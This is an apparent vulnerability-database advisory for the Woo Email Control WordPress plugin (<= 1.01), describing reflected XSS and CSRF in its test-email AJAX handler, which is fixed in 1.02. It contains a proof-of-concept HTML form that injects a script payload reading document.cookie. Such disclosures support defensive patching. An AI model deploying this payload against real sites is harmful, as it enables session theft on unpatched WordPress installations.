Woo Email Control <= 1.01 – Reflected Cross-Site Scripting (XSS) & CSRF | Plugin Vulnerabilities

Description

Due to a lack of encoding and CSRF mitigation in the test_email function found on line 106 of classes/class-wooctrl.php, it is possible to automate a request to the AJAX handler for the wooctrl_send_test_email action which will reflect the specified script back to the end user.

Proof of Concept

<form method="post" action="http://<target>/wp-admin/admin-ajax.php?action=wooctrl_send_test_email">  
    <input type="text" name="email_class" value="WC_Email_Customer_New_Account">
    <input type="text" name="recipient" value="user@user.com<img src=x onerror=alert(document.cookie)>">
    <input type="submit" value="Test">
</form>

Affects Plugins

woo-email-control

Fixed in 1.02

References

URL

https://rastating.github.io/woo-email-control-1-01-reflected-xss-disclosure

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Submitter

Rob Carr

Submitter website

http://blog.rastating.com/

Submitter twitter

Verified

No

WPVDB ID

45cebe34-5f93-4136-8697-e07ae5a3040b

Timeline

Publicly Published

2016-07-19 (about 9 years ago)

Added

2016-07-19 (about 9 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2020-04-22

Title

Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS

Published

2022-09-12

Title

PCA Predict <= 1.0.3 - Admin+ Stored Cross-Site Scripting

Published

2024-07-26

Title

Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder < 5.1.20 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2023-12-18

Title

WP Shortcodes Plugin — Shortcodes Ultimate < 7.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-05-12

Title

WP Register Profile With Shortcode < 3.5.9 - Admin+ Stored XSS